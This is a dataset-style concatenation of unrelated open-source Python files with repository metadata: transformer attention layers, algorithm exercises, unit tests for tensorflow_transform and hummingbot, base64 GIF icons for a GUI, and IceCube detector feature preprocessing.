x, attn = self.attention(query, key, value, mask=mask, dropout=self.dropout)
# 3) "Concat" using a view and apply a final linear.
x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.h * self.d_k)
return self.output_linear(x)
class Attention(nn.Module):
"""
Compute 'Scaled Dot Product Attention'
"""
def __init__(self):
super(Attention, self).__init__()
def forward(self, query, key, value, mask=None, dropout=None):
scores = torch.matmul(query, key.transpose(-2, -1))/math.sqrt(query.size(-1))
if mask is not None:
scores = scores.masked_fill(mask == 0, -1e9)
p_attn = F.softmax(scores, dim=-1)
if dropout is not None:
p_attn = dropout(p_attn)
return torch.matmul(p_attn, value), p_attn
class PositionwiseFeedForward(nn.Module):
"Implements FFN equation."
def __init__(self, d_model, d_ff, dropout=0.1):
super(PositionwiseFeedForward, self).__init__()
self.w_1 = nn.Linear(d_model, d_ff)
self.w_2 = nn.Linear(d_ff, d_model)
self.dropout = nn.Dropout(dropout)
#self.activation = nn.GELU()
self.activation = nn.ReLU()
def forward(self, x):
return self.w_2(self.dropout(self.activation(self.w_1(x))))
class SublayerConnection(nn.Module):
"""
A residual connection followed by a layer norm.
Note for code simplicity the norm is first as opposed to last.
"""
def __init__(self, size, dropout):
super(SublayerConnection, self).__init__()
self.norm = nn.LayerNorm(size)
self.dropout = nn.Dropout(dropout)
def forward(self, x, sublayer):
"Apply residual connection to any sublayer with the same size."
return x + self.dropout(sublayer(self.norm(x)))
| 36.647186
| 126
| 0.631268
| 11,071
| 0.653889
| 0
| 0
| 0
| 0
| 0
| 0
| 5,143
| 0.303762
|
428f4631d1d991fd823deb6aae84c7555b191363
| 9,127
|
py
|
Python
|
ch01/challenge.py
|
laszlokiraly/LearningAlgorithms
|
032a3cc409546619cf41220821d081cde54bbcce
|
[
"MIT"
] | null | null | null |
ch01/challenge.py
|
laszlokiraly/LearningAlgorithms
|
032a3cc409546619cf41220821d081cde54bbcce
|
[
"MIT"
] | null | null | null |
ch01/challenge.py
|
laszlokiraly/LearningAlgorithms
|
032a3cc409546619cf41220821d081cde54bbcce
|
[
"MIT"
] | null | null | null |
"""
Challenge Exercises for Chapter 1.
"""
import random
import timeit
from algs.table import DataTable, ExerciseNum, caption
from algs.counting import RecordedItem
def partition(A, lo, hi, idx):
"""
Partition using A[idx] as value. Note lo and hi are INCLUSIVE on both
ends and idx must be valid index. Count the number of comparisons
by populating A with RecordedItem instances.
"""
if lo == hi:
return lo
A[idx],A[lo] = A[lo],A[idx] # swap into position
i = lo
j = hi + 1
while True:
while True:
i += 1
if i == hi: break
if A[lo] < A[i]: break
while True:
j -= 1
if j == lo: break
if A[j] < A[lo]: break
# doesn't count as comparing two values
if i >= j: break
A[i],A[j] = A[j],A[i]
A[lo],A[j] = A[j],A[lo]
return j
def linear_median(A):
"""
Efficient implementation that returns median value in arbitrary list,
assuming A has an odd number of values. Note this algorithm will
rearrange values in A.
"""
# if len(A) % 2 == 0:
# raise ValueError('linear_median() only coded to work with odd number of values.')
lo = 0
hi = len(A) - 1
mid = hi // 2
while lo < hi:
idx = random.randint(lo, hi) # select valid index randomly
j = partition(A, lo, hi, idx)
if j == mid:
return A[j]
if j < mid:
lo = j+1
else:
hi = j-1
return A[lo]
def median_from_sorted_list(A):
sorted_A = sorted(A)
len_A = len(A)
if len_A % 2 == 0:
return (sorted_A[(len_A//2) - 1] + sorted_A[len_A//2]) / 2
else:
return sorted_A[len_A//2]
def counting_sort(A, M):
"""
Update A in place to be sorted in ascending order if all elements
are guaranteed to be in the range 0 to and not including M.
"""
counts = [0] * M
for v in A:
counts[v] += 1
pos = 0
v = 0
while pos < len(A):
for idx in range(counts[v]):
A[pos+idx] = v
pos += counts[v]
v += 1
def counting_sort_improved(A,M):
"""
Update A in place to be sorted in ascending order if all elements
are guaranteed to be in the range 0 to and not including M.
"""
counts = [0] * M
for val in A:
counts[val] += 1
pos = 0
val = 0
while pos < len(A):
if counts[val] > 0:
A[pos:pos+counts[val]] = [val] * counts[val]
pos += counts[val]
val += 1
def run_counting_sort_trials(max_k=15, output=True):
"""Generate table for counting sort up to (but not including) max_k=15."""
tbl = DataTable([8,15,15],
['N', 'counting_sort', 'counting_sort_improved'], output=output)
M = 20 # arbitrary value, and results are dependent on this value.
trials = [2**k for k in range(8, max_k)]
for n in trials:
t_cs = min(timeit.repeat(stmt='counting_sort(a,{})\nis_sorted(a)'.format(M),
setup='''
import random
from ch01.challenge import counting_sort
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
t_csi = min(timeit.repeat(stmt='counting_sort_improved(a,{})\nis_sorted(a)'.format(M),
setup='''
import random
from ch01.challenge import counting_sort_improved
from algs.sorting import is_sorted
w = [{0}-1] * {1}
b = [0] * {1}
a = list(range({0})) * {1}
random.shuffle(a)'''.format(M,n), repeat=100, number=1))
tbl.row([n, t_cs, t_csi])
return tbl
def run_median_trial():
"""Generate table for Median Trial."""
tbl = DataTable([10,15,15],['N', 'median_time', 'sort_median'])
trials = [2**k+1 for k in range(8,20)]
for n in trials:
t_med = 1000*min(timeit.repeat(stmt='assert(linear_median(a) == {}//2)'.format(n),
setup='''
import random
from ch01.challenge import linear_median
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5
t_sort = 1000*min(timeit.repeat(stmt='assert(median_from_sorted_list(a) == {0}//2)'.format(n),
setup='''
import random
from ch01.challenge import median_from_sorted_list
a = list(range({}))
random.shuffle(a)
'''.format(n), repeat=10, number=5))/5
tbl.row([n, t_med, t_sort])
return tbl
def run_median_less_than_trial(max_k=20, output=True):
"""Use RecordedItem to count # of times Less-than invoked up to (but not including) max_k=20."""
tbl = DataTable([10,15,15],['N', 'median_count', 'sort_median_count'], output=output)
tbl.format('median_count', ',d')
tbl.format('sort_median_count', ',d')
trials = [2**k+1 for k in range(8, max_k)]
for n in trials:
A = list([RecordedItem(i) for i in range(n)])
random.shuffle(A)
# Generated external sorted to reuse list
RecordedItem.clear()
med2 = median_from_sorted_list(A)
sort_lt = RecordedItem.report()[1]
RecordedItem.clear()
med1 = linear_median(A)
lin_lt = RecordedItem.report()[1]
assert med1 == med2
tbl.row([n, lin_lt, sort_lt])
return tbl
def is_palindrome1(w):
"""Create slice with negative step and confirm equality with w."""
return w[::-1] == w
def is_palindrome2(w):
"""Strip outermost characters if same, return false when mismatch."""
while len(w) > 1:
if w[0] != w[-1]: # if mismatch, return False
return False
w = w[1:-1] # strip characters on either end; repeat
return True # must have been a Palindrome
def is_palindrome3(w):
"""iterate from start and from end and compare, without copying arrays"""
for i in range(0,round(len(w)/2)):
if w[i] != w[-(i+1)]:
return False
return True # must have been a Palindrome
def is_palindrome_letters_only(s):
"""
Confirm Palindrome, even when string contains non-alphabet letters
and ignore capitalization.
casefold() method, which was introduced in Python 3.3, could be
used instead of this older method, which converts to lower().
"""
i = 0
j = hi = len(s) - 1
while i < j:
# This type of logic appears in partition.
# Find alpha characters and compare
while not s[i].isalpha():
i += 1
if i == hi: break
while not s[j].isalpha():
j -= 1
if j == 0: break
if s[i].lower() != s[j].lower(): return False
i += 1
j -= 1
return True
def tournament_allows_odd(A):
"""
Returns two largest values in A. Works for odd lists
"""
from ch01.largest_two import Match
if len(A) < 2:
raise ValueError('Must have at least two values')
tourn = []
for i in range(0, len(A)-1, 2):
tourn.append(Match(A[i], A[i+1]))
odd_one_out = None
if len(A) % 2 == 1:
odd_one_out = A[-1]
while len(tourn) > 1:
tourn.append(Match.advance(tourn[0], tourn[1]))
del tourn[0:2]
# Find where second is hiding!
m = tourn[0]
largest = m.larger
second = m.smaller
# Wait until the end, and see where it belongs
if odd_one_out:
if odd_one_out > largest:
largest,second = odd_one_out,largest
elif odd_one_out > second:
second = odd_one_out
while m.prior:
m = m.prior
if second < m.smaller:
second = m.smaller
return (largest,second)
def two_largest_attempt(A):
"""Failed attempt to implement two largest."""
m1 = max(A[:len(A)//2])
m2 = max(A[len(A)//2:])
if m1 < m2:
return (m2, m1)
return (m1, m2)
#######################################################################
if __name__ == '__main__':
chapter = 1
with ExerciseNum(1) as exercise_number:
sample = 'A man, a plan, a canal. Panama!'
print(sample,'is a palindrome:', is_palindrome_letters_only(sample))
print(caption(chapter, exercise_number),
'Palindrome Detector')
with ExerciseNum(2) as exercise_number:
run_median_less_than_trial()
print()
run_median_trial()
print(caption(chapter, exercise_number),
'Median Counting')
with ExerciseNum(3) as exercise_number:
run_counting_sort_trials()
print(caption(chapter, exercise_number),
'Counting Sort Trials')
with ExerciseNum(4) as exercise_number:
print('see tournament_allows_odd in ch01.challenge')
print(caption(chapter, exercise_number),
'Odd tournament')
with ExerciseNum(5) as exercise_number:
print('Should print (9, 8)', two_largest_attempt([9, 3, 5, 7, 8, 1]))
print('Fails to print (9, 8)', two_largest_attempt([9, 8, 5, 7, 3, 1]))
print(caption(chapter, exercise_number),
'Failed Two largest')
| 29.066879
| 102
| 0.573573
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,300
| 0.361565
|
428f6c9308ecfc2aebd2c05427a3eb4c4bcb191b
| 522
|
py
|
Python
|
exaslct_src/lib/data/dependency_collector/dependency_image_info_collector.py
|
mace84/script-languages
|
d586cbe212bbb4efbfb39e095183729c65489360
|
[
"MIT"
] | null | null | null |
exaslct_src/lib/data/dependency_collector/dependency_image_info_collector.py
|
mace84/script-languages
|
d586cbe212bbb4efbfb39e095183729c65489360
|
[
"MIT"
] | 1
|
2019-05-06T07:36:11.000Z
|
2019-05-06T07:36:11.000Z
|
exaslct_src/lib/data/dependency_collector/dependency_image_info_collector.py
|
mace84/script-languages
|
d586cbe212bbb4efbfb39e095183729c65489360
|
[
"MIT"
] | 1
|
2019-05-03T08:49:29.000Z
|
2019-05-03T08:49:29.000Z
|
from typing import Dict
from exaslct_src.lib.data.image_info import ImageInfo
from exaslct_src.lib.data.dependency_collector.dependency_collector import DependencyInfoCollector
class DependencyImageInfoCollector(DependencyInfoCollector[ImageInfo]):
def is_info(self, input):
return isinstance(input, Dict) and IMAGE_INFO in input
def read_info(self, value) -> ImageInfo:
with value[IMAGE_INFO].open("r") as file:
return ImageInfo.from_json(file.read())
IMAGE_INFO = "image_info"
| 29
| 98
| 0.764368
| 313
| 0.599617
| 0
| 0
| 0
| 0
| 0
| 0
| 15
| 0.028736
|
42914f6fbdf21a73ae8be4659f5689614360b711
| 3,131
|
py
|
Python
|
tensorflow_transform/test_case_test.py
|
LaudateCorpus1/transform
|
afee306046b8f656355b0170793ee64423f30e23
|
[
"Apache-2.0"
] | 970
|
2017-02-10T04:33:46.000Z
|
2022-03-26T08:11:20.000Z
|
tensorflow_transform/test_case_test.py
|
LaudateCorpus1/transform
|
afee306046b8f656355b0170793ee64423f30e23
|
[
"Apache-2.0"
] | 216
|
2017-02-23T04:50:59.000Z
|
2022-03-31T13:52:57.000Z
|
tensorflow_transform/test_case_test.py
|
LaudateCorpus1/transform
|
afee306046b8f656355b0170793ee64423f30e23
|
[
"Apache-2.0"
] | 238
|
2017-02-17T16:30:55.000Z
|
2022-03-03T20:10:25.000Z
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensorflow_transform.test_case."""
import re
from tensorflow_transform import test_case
import unittest
class TftUnitTest(test_case.TransformTestCase):
def testCrossNamedParameters(self):
test_cases_1 = [
{'testcase_name': 'a_1_b_1', 'a': 1, 'b': 1},
{'testcase_name': 'a_3_b_3', 'a': 3, 'b': 3},
]
test_cases_2 = [
{'testcase_name': 'c_2', 'c': 2},
{'testcase_name': 'c_4', 'c': 4},
]
expected_cross = [
{'testcase_name': 'a_1_b_1_c_2', 'a': 1, 'b': 1, 'c': 2},
{'testcase_name': 'a_1_b_1_c_4', 'a': 1, 'b': 1, 'c': 4},
{'testcase_name': 'a_3_b_3_c_2', 'a': 3, 'b': 3, 'c': 2},
{'testcase_name': 'a_3_b_3_c_4', 'a': 3, 'b': 3, 'c': 4},
]
self.assertEqual(
test_case.cross_named_parameters(test_cases_1, test_cases_2),
expected_cross)
def testCrossParameters(self):
test_cases_1 = [('a', 1), ('b', 2)]
test_cases_2 = [(True,), (False,)]
expected_cross = [
('a', 1, True), ('b', 2, True),
('a', 1, False), ('b', 2, False),
]
self.assertCountEqual(
test_case.cross_parameters(test_cases_1, test_cases_2), expected_cross)
def testAssertDataCloseOrEqual(self):
self.assertDataCloseOrEqual([{'a': 'first',
'b': 1.0,
'c': 5,
'd': ('second', 2.0)},
{'e': 2,
'f': 3}],
[{'a': 'first',
'b': 1.0000001,
'c': 5,
'd': ('second', 2.0000001)},
{'e': 2,
'f': 3}])
with self.assertRaisesRegexp(AssertionError, r'len\(.*\) != len\(\[\]\)'):
self.assertDataCloseOrEqual([{'a': 1}], [])
with self.assertRaisesRegexp(
AssertionError,
re.compile('Element counts were not equal.*: Row 0', re.DOTALL)):
self.assertDataCloseOrEqual([{'a': 1}], [{'b': 1}])
with self.assertRaisesRegexp(
AssertionError,
re.compile('Not equal to tolerance.*: Row 0, key a', re.DOTALL)):
self.assertDataCloseOrEqual([{'a': 1}], [{'a': 2}])
@test_case.parameters((1, 'a'), (2, 'b'))
def testSampleParametrizedTestMethod(self, my_arg, my_other_arg):
self.assertIn((my_arg, my_other_arg), {(1, 'a'), (2, 'b')})
if __name__ == '__main__':
unittest.main()
| 36.835294
| 79
| 0.544874
| 2,365
| 0.75535
| 0
| 0
| 173
| 0.055254
| 0
| 0
| 1,112
| 0.355158
|
4293119f4fbe0691576ba0bf3959decad7140860
| 6,388
|
py
|
Python
|
metageta/icons.py
|
ssutee/metageta
|
70b7e572acefcce7a8f4d8de719f936934319064
|
[
"MIT"
] | null | null | null |
metageta/icons.py
|
ssutee/metageta
|
70b7e572acefcce7a8f4d8de719f936934319064
|
[
"MIT"
] | null | null | null |
metageta/icons.py
|
ssutee/metageta
|
70b7e572acefcce7a8f4d8de719f936934319064
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Australian Government, Department of the Environment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
base 64 encoded gif images for the GUI buttons
'''
class app_img:
format='gif'
data='''R0lGODlhEAAQAOeRACcLIiAbCSAjCjMdMzsfMjUkGUcmRjwwJ0YqRj4xJVwoUFguRkU2MS0/LzQ8
PC8/LzM+QTJCMDJCQTpCQCxIME1CIXQyYW48KTpLO1REPEpKSktKS01KSkpLSkxLTE1LS0VNUDtS
PD9PT0tMTExMTE1MTUxNTU1NTU5NTUFUQFFOTkZRU1BPTU9QUUVTVF9PO1JUVVRVSnlNMEVeRlZX
W1ZYVVZYWF5XVFBdUkpfX2RZXIZMgVtdX11eX1tfW1xfW1tfXqZEkFtgW2NfYWZgW2tdal9iXk9m
Z19iYk9pTqZIn5lNlU1rTp1XOF9lZVxnXF5oXlNrZ59eM1FzU1dyVcVItJJmSl5ycq1Wp1t0cLlU
tWB1eF52dmKBY12DX9RWwGN/f+RSzaVzTdNbxmaEhLlzRdFhs2WJZWeJZmOMZ7Z2UXGGhm2IiGqJ
iKV+VmuKimyKi26Ojm2ScnGQkGuWb22Wb3OTk+xp2+dr5eF73Pl154SfoMKYeIampoimptiYbPuB
8viD8I2sq/KJ7pOtrZGuruebbpGvr/+I/Ja1tdqrf9i3i/iweviwhP+zhf/Hif/Lpf//////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////yH5BAEKAP8ALAAAAAAQABAA
AAjRAP8JHEiwoMGBGk6MOChQgwYgEnJwcdGjoAYbIo5EyQIGjh02axyYIOjkSqI4bci8mdPnECEk
Ggi2WFHIj6A9WyDQgEFiYIcfKR5MAMHDhJAQTCLUIGgEQ5cZDZKgqUMnDRUfMQVu8ADFi5wzUyjg
KLEh6z8PCAZhGfIEBQALZgAtMUCwyI48Y6roQRToThglAzYMZEFkgRY8X4Io0CEgBkENByDxYUAg
QAU3jB6JKUBQxYtFigw5avSnjBQZN8wKTGBFTZMLGRwy/Mfhg2qCAQEAOw=='''
class shp_img:
format='gif'
data='''R0lGODlhEAAQAMIFABAQEIBnII+HgLS0pfDwsC8gIC8gIC8gICH5BAEKAAcALAAAAAAQABAAAAND
eLrcJzBKqcQIN+MtwAvTNHTPSJwoQAigxwpouo4urZ7364I4cM8kC0x20n2GRGEtJGl9NFBMkBny
HHzYrNbB7XoXCQA7'''
class dir_img:
format='gif',
data='''R0lGODlhEAAQAMZUABAQEB8QEB8YEC8gIC8vIEA4ME9IQF9IIFpTSWBXQHBfUFBoj3NlRoBnII9v
IIBwUGB3kH93YIZ5UZ94IJB/YIqAcLB/EI+IcICHn4+HgMCHEI6Oe4CPn4+PgMCQANCHEJ+PgICX
r9CQANCQEJ+XgJKanaCgkK+fgJykoaKjo7CgkKimk+CfIKKoo6uoleCgMLCnkNCnUKuwpLSvkrSv
mfCoMLWyn7+wkM+vcLS0pfCwML+4kPC3QNDAgM+/kPDAQP+/UODIgP/IUODQoP/QUPDQgP/QYP/P
cPDYgP/XYP/XcP/YgPDgkP/ggP/gkPDnoP/noPDwoPDwsP/woP//////////////////////////
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////yH5
BAEKAH8ALAAAAAAQABAAAAe1gH+Cg4SFhoQyHBghKIeEECV/ORwtEDYwmJg0hikLCzBDUlJTUCoz
hZ4LKlGjUFBKJiQkIB0XgypPpFBLSb2+toImT643N5gnJ7IgIBkXJExQQTBN1NVNSkoxFc9OMDtK
vkZEQjwvDC4gSNJNR0lGRkI/PDoNEn8gRTA+Su9CQPM1PhxY8SdDj2nw4umowWJEAwSCLqjAIaKi
Bw0WLExwcGBDRAoRHihIYKAAgQECAARwxFJQIAA7'''
class xls_img:
format='gif'
data='''R0lGODlhEAAQAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/
/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm
AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/
MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm
ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/
mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm
zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/
/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ
AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA
M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ
ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A
mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z
zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///ywAAAAAEAAQAAAIngBfuUKF
ipBBg4MS9umTJYsrBAheSZwokGBBhwgeaNzIUSOhLKgydhz5EdWrB4oOelT5kdDJLwgUKRpEKOUX
Gtpannzw5ZVNQje15czicmNPg1lwCtW5EeirQV+IEtI2iOjOmh9dQc2SimqWQa4efGzYcGZUr4NQ
ddSWimwWr33UahRKly61qn0Iza1rl9qXKVIPIkyY8Mtft4gTTwkIADs='''
class xsl_img:
format='gif'
data='''R0lGODdhEAAQAOMPAAAAAAAAgAAAmQAA/zNmmQCAgDNm/zOZAIaGhjOZ/zPM/8DAwKbK8DP///Hx
8f///ywBAAAADwAQAAAEWBDJSeW76Or9Vn4f5zzOAp5kOo5AC2QOMxaFQcrP+zDCUzyNROAhkL14
pEJDcQiMijqkIXEYDIsOXWwU6N5Yn5VKpSWYz2fwRcwmldFo9bidhc3Hrrw+HwEAOw=='''
class log_img:
format='gif'
data='''R0lGODlhEAAQAIQQAG9s0oJ5eatyP6tycpePj6ulP6ulctWeOaulpdWentXSOcvHx9XS0v/MzP//
zP///y8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gIC8gICH5BAEK
ABAALAAAAAAQABAAAAViICSOUNMwjEOOhyIUyhAbzMoAgJAQi9EjtRGAIXgUjw9CUDR8OJ9OJakJ
fUqFjCSBZ11CqNWkt7ndLqLjbFg8zZa5bOw6znSfoVfm3clYIP5eEH4EAQFlCAsrEH2ICygoJCEA
Ow=='''
| 63.88
| 89
| 0.688009
| 5,129
| 0.802912
| 0
| 0
| 0
| 0
| 0
| 0
| 6,111
| 0.956637
|
42934dc5c7b47e76f47a4a49a47981e068b48692
| 1,417
|
py
|
Python
|
chmp/src/chmp/torch_utils/_test_bayes.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 6
|
2017-10-31T20:54:37.000Z
|
2020-10-23T19:03:00.000Z
|
chmp/src/chmp/torch_utils/_test_bayes.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 7
|
2020-03-24T16:14:34.000Z
|
2021-03-18T20:51:37.000Z
|
chmp/src/chmp/torch_utils/_test_bayes.py
|
chmp/misc-exp
|
2edc2ed598eb59f4ccb426e7a5c1a23343a6974b
|
[
"MIT"
] | 1
|
2019-07-29T07:55:49.000Z
|
2019-07-29T07:55:49.000Z
|
import torch
import pytest
# NOTE: also registers the KL divergence
from chmp.torch_utils import NormalModule, WeightsHS, fixed
def test_kl_divergence__gamma__log_normal():
p = torch.distributions.LogNormal(torch.zeros(2), torch.ones(2))
q = torch.distributions.Gamma(torch.ones(2), torch.ones(2))
torch.distributions.kl_divergence(p, q)
def test__module_parameters():
module = NormalModule(loc=torch.zeros(1), scale=fixed(torch.ones(1)))
assert {k for k, _ in module.named_parameters()} == {"loc"}
module = NormalModule(loc=torch.zeros(1), scale=torch.ones(1))
assert {k for k, _ in module.named_parameters()} == {"loc", "scale"}
module = NormalModule(torch.zeros(1), scale=fixed(torch.ones(1)))
assert {k for k, _ in module.named_parameters()} == {"loc"}
def test__module_fixed_parameters_optimize():
module = NormalModule(torch.zeros(1), fixed(torch.ones(1)))
optimizer = torch.optim.Adam(module.parameters(), lr=0.1)
for _ in range(100):
optimizer.zero_grad()
x = module.rsample((20,))
loss = torch.mean((x - 2.0) ** 2.0)
loss.backward()
optimizer.step()
assert float(module.loc) != pytest.approx(0.0)
assert float(module.scale) == pytest.approx(1.0)
def test_weight_hs_api():
w = WeightsHS([10, 20, 30], tau_0=1e-5)
assert w().shape == (10, 20, 30)
assert w.kl_divergence().shape == ()
| 28.918367
| 73
| 0.666902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 62
| 0.043754
|
4293fa719a880b9bfe3a700da09a0f285fc6495b
| 867
|
py
|
Python
|
test/hummingbot/core/utils/test_fixed_rate_source.py
|
BGTCapital/hummingbot
|
2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242
|
[
"Apache-2.0"
] | 3,027
|
2019-04-04T18:52:17.000Z
|
2022-03-30T09:38:34.000Z
|
test/hummingbot/core/utils/test_fixed_rate_source.py
|
BGTCapital/hummingbot
|
2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242
|
[
"Apache-2.0"
] | 4,080
|
2019-04-04T19:51:11.000Z
|
2022-03-31T23:45:21.000Z
|
test/hummingbot/core/utils/test_fixed_rate_source.py
|
BGTCapital/hummingbot
|
2c50f50d67cedccf0ef4d8e3f4c8cdce3dc87242
|
[
"Apache-2.0"
] | 1,342
|
2019-04-04T20:50:53.000Z
|
2022-03-31T15:22:36.000Z
|
from decimal import Decimal
from unittest import TestCase
from hummingbot.core.utils.fixed_rate_source import FixedRateSource
class FixedRateSourceTests(TestCase):
def test_look_for_unconfigured_pair_rate(self):
rate_source = FixedRateSource()
self.assertIsNone(rate_source.rate("BTC-USDT"))
def test_get_rate(self):
rate_source = FixedRateSource()
rate_source.add_rate("BTC-USDT", Decimal(40000))
self.assertEqual(rate_source.rate("BTC-USDT"), Decimal(40000))
def test_get_rate_when_inverted_pair_is_configured(self):
rate_source = FixedRateSource()
rate_source.add_rate("BTC-USDT", Decimal(40000))
self.assertEqual(rate_source.rate("USDT-BTC"), Decimal(1) / Decimal(40000))
def test_string_representation(self):
self.assertEqual(str(FixedRateSource()), "fixed rates")
| 32.111111
| 83
| 0.731257
| 737
| 0.850058
| 0
| 0
| 0
| 0
| 0
| 0
| 63
| 0.072664
|
4297be6e9ea671a123810cad1577476fb18a42d0
| 5,293
|
py
|
Python
|
src/graphnet/models/detector/icecube.py
|
kaareendrup/gnn-reco
|
21f4e36ef17c765a04cde0b2e34d5f802a988055
|
[
"Apache-2.0"
] | null | null | null |
src/graphnet/models/detector/icecube.py
|
kaareendrup/gnn-reco
|
21f4e36ef17c765a04cde0b2e34d5f802a988055
|
[
"Apache-2.0"
] | null | null | null |
src/graphnet/models/detector/icecube.py
|
kaareendrup/gnn-reco
|
21f4e36ef17c765a04cde0b2e34d5f802a988055
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch_geometric.data import Data
from graphnet.components.pool import group_pulses_to_dom, group_pulses_to_pmt, sum_pool_and_distribute
from graphnet.data.constants import FEATURES
from graphnet.models.detector.detector import Detector
class IceCube86(Detector):
"""`Detector` class for IceCube-86."""
# Implementing abstract class attribute
features = FEATURES.ICECUBE86
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Preprocessing
data.x[:,0] /= 100. # dom_x
data.x[:,1] /= 100. # dom_y
data.x[:,2] += 350. # dom_z
data.x[:,2] /= 100.
data.x[:,3] /= 1.05e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,3] *= 20.
data.x[:,4] /= 1. # charge
data.x[:,5] -= 1.25 # rde
data.x[:,5] /= 0.25
data.x[:,6] /= 0.05 # pmt_area
return data
class IceCubeDeepCore(IceCube86):
"""`Detector` class for IceCube-DeepCore."""
class IceCubeUpgrade(IceCubeDeepCore):
"""`Detector` class for IceCube-Upgrade."""
# Implementing abstract class attribute
features = FEATURES.UPGRADE
def _forward(self, data: Data) -> Data:
"""Ingests data, builds graph (connectivity/adjacency), and preprocesses features.
Args:
data (Data): Input graph data.
Returns:
Data: Connected and preprocessed graph data.
"""
# Check(s)
self._validate_features(data)
# Preprocessing
data.x[:,0] /= 500. # dom_x
data.x[:,1] /= 500. # dom_y
data.x[:,2] /= 500. # dom_z
data.x[:,3] /= 2e+04 # dom_time
data.x[:,3] -= 1.
data.x[:,4] = torch.log10(data.x[:,4]) / 2. # charge
#data.x[:,5] /= 1. # rde
data.x[:,6] /= 0.05 # pmt_area
data.x[:,7] -= 50. # string
data.x[:,7] /= 50.
data.x[:,8] /= 20. # pmt_number
data.x[:,9] -= 60. # dom_number
data.x[:,9] /= 60.
#data.x[:,10] /= 1. # pmt_dir_x
#data.x[:,11] /= 1. # pmt_dir_y
#data.x[:,12] /= 1. # pmt_dir_z
data.x[:,13] /= 130. # dom_type
return data
class IceCubeUpgrade_V2(IceCubeDeepCore):
"""`Detector` class for IceCube-Upgrade."""
# Implementing abstract class attribute
features = FEATURES.UPGRADE
@property
def nb_outputs(self):
return self.nb_inputs + 3
